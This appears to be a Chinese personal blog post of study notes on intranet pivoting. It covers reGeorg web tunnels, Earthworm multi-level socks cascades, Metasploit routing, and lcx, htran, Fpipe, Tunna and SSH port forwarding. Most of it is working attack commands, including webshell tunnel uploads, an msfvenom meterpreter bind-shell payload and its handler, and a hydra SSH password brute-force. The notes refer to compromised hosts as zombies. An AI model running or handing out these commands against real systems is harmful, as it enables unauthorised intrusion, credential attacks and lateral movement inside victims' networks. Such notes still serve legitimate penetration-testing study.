<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="内网渗透,">










<meta name="description" content="内网代理内网代理分类：正向代理：lhost→代理工具→rhost（攻击者主动连接，需要远程服务器开启端口，可能被防火墙检测到） 反向代理：rhost→代理工具→firewall→lhost(攻击者主机开启端口监听，远程主机主动过来连接) 采用Reverse的方法较为安全，采用bind方式容易被发现 Web代理reGeorgphp版本 &amp;lt;= 5.4 reGeorg + ProxifierreG">
<meta name="keywords" content="内网渗透">
<meta property="og:type" content="article">
<meta property="og:title" content="代理转发">
<meta property="og:url" content="https://jeremyekek.github.io/2019/07/15/代理转发/index.html">
<meta property="og:site_name" content="EkEk的个人博客">
<meta property="og:description" content="内网代理内网代理分类：正向代理：lhost→代理工具→rhost（攻击者主动连接，需要远程服务器开启端口，可能被防火墙检测到） 反向代理：rhost→代理工具→firewall→lhost(攻击者主机开启端口监听，远程主机主动过来连接) 采用Reverse的方法较为安全，采用bind方式容易被发现 Web代理reGeorgphp版本 &amp;lt;= 5.4 reGeorg + ProxifierreG">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-07-18T14:58:03.249Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="代理转发">
<meta name="twitter:description" content="内网代理内网代理分类：正向代理：lhost→代理工具→rhost（攻击者主动连接，需要远程服务器开启端口，可能被防火墙检测到） 反向代理：rhost→代理工具→firewall→lhost(攻击者主机开启端口监听，远程主机主动过来连接) 采用Reverse的方法较为安全，采用bind方式容易被发现 Web代理reGeorgphp版本 &amp;lt;= 5.4 reGeorg + ProxifierreG">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"right","display":"post","offset":20,"b2t":true,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":true,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://jeremyekek.github.io/2019/07/15/代理转发/">





  <title>代理转发 | EkEk的个人博客</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">EkEk的个人博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://jeremyekek.github.io/2019/07/15/代理转发/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="EkEk">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="EkEk的个人博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">代理转发</h1>
        

        <div class="post-meta">
          <span class="post-time">
            

            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2019-07-18T22:58:03+08:00">
                2019-07-18
              </time>
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/学习笔记/" itemprop="url" rel="index">
                    <span itemprop="name">学习笔记</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/07/15/代理转发/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2019/07/15/代理转发/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="内网代理"><a href="#内网代理" class="headerlink" title="内网代理"></a>内网代理</h1><h2 id="内网代理分类："><a href="#内网代理分类：" class="headerlink" title="内网代理分类："></a>内网代理分类：</h2><p>正向代理：lhost→代理工具→rhost（攻击者主动连接，需要远程服务器开启端口，可能被防火墙检测到）</p>
<p>反向代理：rhost→代理工具→firewall→lhost(攻击者主机开启端口监听，远程主机主动过来连接)</p>
<p>采用Reverse的方法较为安全，采用bind方式容易被发现</p>
<h2 id="Web代理"><a href="#Web代理" class="headerlink" title="Web代理"></a>Web代理</h2><h3 id="reGeorg"><a href="#reGeorg" class="headerlink" title="reGeorg"></a>reGeorg</h3><p>php版本 &lt;= 5.4</p>
<h4 id="reGeorg-Proxifier"><a href="#reGeorg-Proxifier" class="headerlink" title="reGeorg + Proxifier"></a>reGeorg + Proxifier</h4><p>reGeorg基于Socks5代理，一般需要和Proxifier配套使用，整个过程也是使用HTTP协议传输，操作较为复杂。</p>
<p>使用的Proxifier工具保证其底层数据建立连接的过程中使用socket通信（ping、icmp、网络层）</p>
<p>上传<code>tunnel.php</code>或者<code>tunnel.nosocket.php</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 reGeorgSocksProxy.py -p 9999 -u http://192.168.10.15/tunnel.nosocket.php</span><br></pre></td></tr></table></figure>
<h4 id="reGeorg-sockscap64"><a href="#reGeorg-sockscap64" class="headerlink" title="reGeorg + sockscap64"></a>reGeorg + sockscap64</h4><h4 id="reGeorg-proxychains-Linux"><a href="#reGeorg-proxychains-Linux" class="headerlink" title="reGeorg + proxychains(Linux)"></a>reGeorg + proxychains(Linux)</h4><p>修改配置文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/proxychains.conf</span><br><span class="line">socks5 127.0.0.1 9999</span><br></pre></td></tr></table></figure>
<p>使用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains nmap 192.168.6.0/24</span><br></pre></td></tr></table></figure>
<h3 id="冰蝎代理-sockscap64"><a href="#冰蝎代理-sockscap64" class="headerlink" title="冰蝎代理 + sockscap64"></a>冰蝎代理 + sockscap64</h3><h3 id="菜刀连内网数据库"><a href="#菜刀连内网数据库" class="headerlink" title="菜刀连内网数据库"></a>菜刀连内网数据库</h3><h3 id="Earthworm"><a href="#Earthworm" class="headerlink" title="Earthworm"></a>Earthworm</h3><p>轻量级内网穿透工具，基于C，Readme介绍的很详细</p>
<p>三大功能：socks5代理，端口转发，端口映射</p>
<p>nmap扫描加-Pn不检测主机存活，-sT识别更准确</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">-s 指定链路状态，6种：ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran</span><br><span class="line">-l 本地监听的端口</span><br><span class="line">-d 指定转发或者反弹的主机地址</span><br><span class="line">-e 指定转发或者反弹的主机端口</span><br><span class="line">-f 连接或者映射的主机地址</span><br><span class="line">-g 连接或者映射的主机端口</span><br></pre></td></tr></table></figure>
<blockquote>
<p>6种链路状态：</p>
<p>其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供，分别对应正向与反向socks代理。<br>其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。</p>
</blockquote>
<p><strong>正向socks5代理</strong></p>
<p>目标网络边界存在公网IP且可任意开监听端口</p>
<pre><code>+---------+     +-------------------+  
|HackTools| -&gt;&gt; | 1080 -&gt;  1.1.1.1  |
+---------+     +-------------------+

./ew -s ssocksd -l 1080                    #建立socks5服务器
</code></pre><p><strong>反向socks5代理</strong></p>
<p>适用于目标无公网IP，但可访问互联网</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">   				      一台可控公网IP主机                    可控内网主机                    </span><br><span class="line">+---------+     +--------------------------+    |     +---------------+</span><br><span class="line">|HackTools| -&gt;&gt; | 1080 -&gt; 0.0.0.0 -&gt; 55545 |  防火墙   | &lt;--  1.1.1.1  |</span><br><span class="line">+---------+     +--------------------------+    |     +---------------+</span><br><span class="line"></span><br><span class="line">./ew -s rcsocks -l 1080 -e 55545 		#VPS监听</span><br><span class="line">./ew -s rssocks -d 1.1.1.1 -e 55545 	#socks5服务器主动连接</span><br></pre></td></tr></table></figure>
<p>端口转发</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">./ew -s lcx_listen -l 1080 -e 55545							#0.0.0.0</span><br><span class="line">./ew -s lcx_slave -d 0.0.0.0 -e 55545 -f 1.1.1.1 -g 55545	#0.0.0.0，1.1.1.1</span><br><span class="line">./ew -s lcx_tran -l 55545 -f 2.2.2.2 -g 3389				#1.1.1.1，2.2.2.2</span><br></pre></td></tr></table></figure>
<p>0.0.0.0为vps，1.1.1.1为内网1，2.2.2.2为内网2</p>
<blockquote>
<p>lcx_slave  该管道一侧通过反弹方式连接代理请求方，另一侧连接代理提供主机。<br>lcx_tran   该管道，通过监听本地端口接收代理请求，并转交给代理提供主机。<br>lcx_listen 该管道，通过监听本地端口接收数据，并将其转交给目标网络回连的代理提供主机。</p>
<p>通过组合lcx类别管道的特性，可以实现多层内网环境下的渗透测试。</p>
</blockquote>
<p><strong>二级级联（一层代理）</strong></p>
<p>边界可开端口（正向代理），二层网络不用开</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">						可控边界主机A             可访问指定资源的主机B</span><br><span class="line">+---------+     +-----------------------+      +-----------------+</span><br><span class="line">|HackTools| -&gt;&gt; | 1080 --&gt; 1.1.1.1  --&gt; | -&gt;&gt;  |  80 -&gt; 2.2.2.2  |</span><br><span class="line">+---------+     +-----------------------+      +-----------------+</span><br><span class="line"></span><br><span class="line">./ew -s ssocksd  -l 80										#1.1.1.1，2.2.2.2</span><br><span class="line">./ew -s lcx_tran -l 1080 -f 1.1.1.1 -g 80					#1.1.1.1，0.0.0.0</span><br><span class="line">HackTools可通过访问0.0.0.0:1080来使用B主机提供的socks5代理。	 #0.0.0.0</span><br></pre></td></tr></table></figure>
<p><strong>二级级联（一层代理）</strong></p>
<p>边界不可开端口（反向代理），二层网络开</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">     				一台可控公网IP主机              可控内网主机A         可访问指定资源的主机B</span><br><span class="line">+---------+     +----------------------+   |   +---------------+     +----------------+</span><br><span class="line">|HackTools| -&gt;&gt; | 1080-&gt;0.0.0.0-&gt;55545 | 防火墙 | &lt;--1.1.1.1--&gt; | -&gt;&gt; | 55545-&gt;2.2.2.2 |</span><br><span class="line">+---------+     +----------------------+   |   +---------------+     +----------------+</span><br><span class="line"></span><br><span class="line">./ew -s lcx_listen -l 1080 -e 55545							#0.0.0.0</span><br><span class="line">./ew -s lcx_slave -d 0.0.0.0 -e 55545 -f 1.1.1.1 -g 55545	#0.0.0.0，1.1.1.1</span><br><span class="line">./ew -s ssocksd -l 55545									#1.1.1.1，2.2.2.2</span><br></pre></td></tr></table></figure>
<p><strong>三级级联（两层代理）</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">./ew -s rcsocks -l 1080 -e 55545							#0.0.0.0</span><br><span class="line">./ew -s lcx_slave -d 0.0.0.0 -e 55545 -f 1.1.1.1 -g 55545	#0.0.0.0，1.1.1.1</span><br><span class="line">./ew -s lcx_listen -l 55545 -e 55544						#1.1.1.1，2.2.2.2</span><br><span class="line">./ew -s rssocks -d 3.3.3.3 -e 55544							#2.2.2.2，3.3.3.3</span><br></pre></td></tr></table></figure>
<p>数据流向: SOCKS v5 -&gt; 0.0.0.0:1080 -&gt; 1.1.1.1:55545 -&gt; 2222:55544 -&gt; rssocks</p>
<p><strong>多级级联</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">#四级级联</span><br><span class="line">./ew -s rcsocks -l 1080 -e 55545							#0.0.0.0</span><br><span class="line">./ew -s lcx_slave -d 0.0.0.0 -e 55545 -f 1.1.1.1 -g 55545	#0.0.0.0，1.1.1.1</span><br><span class="line">./ew -s lcx_listen -l 55545 -e 55544						#1.1.1.1，2.2.2.2</span><br><span class="line">./ew -s lcx_slave -d 2.2.2.2 -e 55544 -f 3.3.3.3 -g 55545   #2.2.2.2，3.3.3.3</span><br><span class="line">./ew -s ssocksd -l 55545									#3.3.3.3，4.4.4.4</span><br><span class="line"></span><br><span class="line">#五级级联</span><br><span class="line">./ew -s rcsocks -l 1080 -e 55545							#0.0.0.0</span><br><span class="line">./ew -s lcx_slave -d 0.0.0.0 -e 55545 -f 1.1.1.1 -g 55545	#0.0.0.0，1.1.1.1</span><br><span class="line">./ew -s lcx_listen -l 55545 -e 55544						#1.1.1.1，2.2.2.2</span><br><span class="line">./ew -s lcx_slave -d 2.2.2.2 -e 55544 -f 3.3.3.3 -g 55544   #2.2.2.2，3.3.3.3</span><br><span class="line">./ew -s lcx_listen -l 55544 -e 55545						#3.3.3.3，4.4.4.4</span><br><span class="line">./ew -s rssocks -d 3.3.3.3 -e 55545							#4.4.4.4，5.5.5.5</span><br></pre></td></tr></table></figure>
<blockquote>
<p>多级级联的三种状态可以转发任意以TCP为基础的通讯服务，包括远程桌面／web服务 等。</p>
</blockquote>
<h3 id="msf"><a href="#msf" class="headerlink" title="msf"></a>msf</h3><p>autoroute</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; ipconfig</span><br><span class="line">meterpreter &gt; run get_local_subnets 			#查看目标主机路由信息</span><br><span class="line">meterpreter &gt; run autoroute -s 192.168.6.0/24			#添加路由</span><br><span class="line">meterpreter &gt; run autoroute -d -s 192.168.6.0/24		#删除路由</span><br><span class="line">meterpreter &gt; run autoroute -p							#查看路由</span><br><span class="line"></span><br><span class="line">Active Routing Table</span><br><span class="line">====================</span><br><span class="line"></span><br><span class="line">   Subnet             Netmask            Gateway</span><br><span class="line">   ------             -------            -------</span><br><span class="line">   192.168.6.0        255.255.255.0      Session 1</span><br><span class="line"></span><br><span class="line">background</span><br><span class="line">use post/windows/gather/arp_scanner		#可以先通过arp扫描粗略的扫一眼目标内网的机器大概有多少</span><br><span class="line">use auxiliary/scanner/portscan/			#端口扫描								</span><br><span class="line">show options</span><br></pre></td></tr></table></figure>
<p>socks代理</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">route add 1.1.1.1 255.255.255.255 1		#除了上面的自动，也可以手动加</span><br><span class="line">use auxiliary/server/socks4a </span><br><span class="line">set srvhost 127.0.0.1</span><br><span class="line">set srvport 1080</span><br><span class="line">run</span><br><span class="line"></span><br><span class="line">vi /etc/proxychains.conf</span><br><span class="line">socks4	127.0.0.1 1080</span><br><span class="line">proxychains nmap -sT -Pn 192.168.6.0/24</span><br><span class="line">proxychains hydra -l root -P pass.txt -f -t 20 ssh://192.168.244.132</span><br></pre></td></tr></table></figure>
<p>msf添加的路由全为正向连接，所以不能reverse_tcp，而需要bind_tcp正向连接，bind_tcp只需要开启一个端口</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe &gt; shell.exe</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set PAYLOAD windows/meterpreter/bind_tcp</span><br><span class="line">set RHOST 192.168.6.5    	#靶机ip</span><br><span class="line">set LPORT 8888    			#靶机绑定的端口</span><br><span class="line">set ExitOnSession false</span><br><span class="line">exploit -j -z</span><br></pre></td></tr></table></figure>
<h3 id="SSH"><a href="#SSH" class="headerlink" title="SSH"></a>SSH</h3><p>内网穿透（多级代理）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ssh -D 127.0.0.1:1080 -p 22 root@1.1.1.1					#0.0.0.0</span><br><span class="line">Add socks4 127.0.0.1:1080 in /etc/proxychains.conf		</span><br><span class="line">proxychains ssh -D 127.0.0.1:1081 -p 22 root@2.2.2.2		#0.0.0.0</span><br><span class="line">Add socks4 127.0.0.1:1081 in /etc/proxychains.conf</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<h1 id="端口转发"><a href="#端口转发" class="headerlink" title="端口转发"></a>端口转发</h1><h3 id="lcx-exe"><a href="#lcx-exe" class="headerlink" title="lcx.exe"></a>lcx.exe</h3><p>有Windows版和Linux版两个版本，Windows版是lcx.exe,Linux版为portmap。</p>
<p>lcx有两大功能：</p>
<ol>
<li><p>端口转发(listen和slave成对使用)</p>
</li>
<li><p>端口映射(tran)</p>
</li>
</ol>
<p>端口转发</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">.\lcx.exe -listen 51 3388</span><br><span class="line">portmap -m 2 -p1 51 -p2 3388</span><br></pre></td></tr></table></figure>
<p>51为转发传输端口，3388为本机任意未被占用的端口</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">.\lcx.exe -slave 0.0.0.0 51 1.1.1.1 3389</span><br><span class="line">portmap -m 3 -h1 0.0.0.0 -p1 51 -h2 1.1.1.1 -p2 3389</span><br></pre></td></tr></table></figure>
<p>0.0.0.0为VPS，51为转发端口，1.1.1.1为肉鸡内网IP，3389为远程终端端口</p>
<p>3389连接时格式：127.0.0.1:3388</p>
<p>本地端口转发</p>
<p>由于防火墙限制，部分端口如3389无法通过防火墙，此时可以将该目标主机的3389端口透传到防火墙允许的其他端口，如53端口，目标主机上执行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">.\lcx.exe -tran 53 1.1.1.1 3389</span><br><span class="line">portmap -m 1 -p1 53 -h2 1.1.1.1 -p2 3389</span><br></pre></td></tr></table></figure>
<p>二层内网（一级代理）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">.\lcx.exe -listen 51 3388					#VPS监听</span><br><span class="line">.\lcx.exe -slave 0.0.0.0 51 1.1.1.1 51		#内网1</span><br><span class="line">.\lcx.exe -tran 51 2.2.2.2 3389				#内网2</span><br></pre></td></tr></table></figure>
<p>数据流向：127.0.0.1:3388 -&gt; 51 -&gt; 1.1.1.1:51 -&gt; 2.2.2.2:3389</p>
<p>三层内网（二级代理）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">.\lcx.exe -listen 51 3388					#VPS监听</span><br><span class="line">.\lcx.exe -slave 0.0.0.0 51 1.1.1.1 51		#内网1</span><br><span class="line">.\lcx.exe -listen 50 51						#内网2</span><br><span class="line">.\lcx.exe -slave 2.2.2.2 50 3.3.3.3 3389	#内网3</span><br></pre></td></tr></table></figure>
<p>数据流向：127.0.0.1:3388 -&gt; 51 -&gt; 1.1.1.1:51 -&gt; 2.2.2.2:51  -&gt; 50 -&gt; 3.3.3.3:3389</p>
<p>N层内网</p>
<p>listen和slave成对使用，可衍生至N级代理</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">.\lcx.exe -listen 51 3388					#VPS监听</span><br><span class="line">.\lcx.exe -slave 0.0.0.0 51 1.1.1.1 51		#内网1</span><br><span class="line">.\lcx.exe -listen 50 51						#内网2</span><br><span class="line">...</span><br><span class="line">.\lcx.exe -slave 2.2.2.2 50 3.3.3.3 50		#内网3</span><br><span class="line">.\lcx.exe -listen 51 50						#内网4</span><br><span class="line">...</span><br><span class="line">.\lcx.exe -slave 2.2.2.2 50 3.3.3.3 50		#内网5</span><br><span class="line">.\lcx.exe -tran 50 2.2.2.2 3389				#内网6</span><br></pre></td></tr></table></figure>
<h3 id="htran-exe"><a href="#htran-exe" class="headerlink" title="htran.exe"></a>htran.exe</h3><p><strong>正向代理</strong></p>
<p>服务端 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">htran.exe -s -bind 8888</span><br></pre></td></tr></table></figure>
<p>客户端 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SocksCap:SOCKS Version 5 服务端IP:8888</span><br></pre></td></tr></table></figure>
<p><strong>反向代理</strong></p>
<p>客户端 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">htran.exe -s -listen 1234 8888</span><br></pre></td></tr></table></figure>
<p>服务端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">htran.exe -s -connect 客户端IP 1234</span><br></pre></td></tr></table></figure>
<p>客户端 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SocksCap:SOCKS Version 5 127.0.0.1:8888</span><br></pre></td></tr></table></figure>
<p><strong>正向端口转发</strong></p>
<p>VPS</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">htran.exe -p -tran 8888 127.0.0.1 3389</span><br></pre></td></tr></table></figure>
<p>客户端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">RDP 服务端IP:8888</span><br></pre></td></tr></table></figure>
<p><strong>反向端口转发</strong></p>
<p>VPS</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">htran.exe -p -listen 7777 8888</span><br></pre></td></tr></table></figure>
<p>服务端 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">htran.exe -p -slave 客户端IP 7777 127.0.0.1 3389</span><br></pre></td></tr></table></figure>
<p>客户端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">RDP 127.0.0.1:8888</span><br></pre></td></tr></table></figure>
<h3 id="Fpipe"><a href="#Fpipe" class="headerlink" title="Fpipe"></a>Fpipe</h3><p>端口重定向,多端口转发</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">-l 在本地监听的端口</span><br><span class="line">-s 从哪个端口发送出重定向的信息</span><br><span class="line">-r 要定向到IP主机的端口号</span><br><span class="line">-u UDP模式</span><br><span class="line">-v 详细地显示过程</span><br></pre></td></tr></table></figure>
<p>来自80端口的信息，通过90端口，重定向到C主机的3389端口上</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fpipe.exe -l 80 -s 90 -r 3389 1.1.1.1</span><br></pre></td></tr></table></figure>
<h3 id="Tunna"><a href="#Tunna" class="headerlink" title="Tunna"></a>Tunna</h3><p>服务端</p>
<p>上传脚本</p>
<p>客户端</p>
<p>运行proxy.py 并指定端口 python proxy.py -u <a href="http://219.x.x.x/conn.jsp" target="_blank" rel="noopener">http://219.x.x.x/conn.jsp</a> -l 1234 -r 3389 -v</p>
<p>本地执行 rdesktop 127.0.0.1:1234</p>
<p>bug : 在过程中，出现远程桌面的黄框后程序断掉，不要关闭这个提示，再运行一次即可。</p>
<h3 id="ssh"><a href="#ssh" class="headerlink" title="ssh"></a>ssh</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]</span><br><span class="line">ssh -L 8080:127.0.0.1:80 root@1.1.1.1	# Local Port</span><br><span class="line">ssh -R 8080:127.0.0.1:80 root@0.0.0.0	# Remote Port</span><br></pre></td></tr></table></figure>
<p>远程端口转发</p>
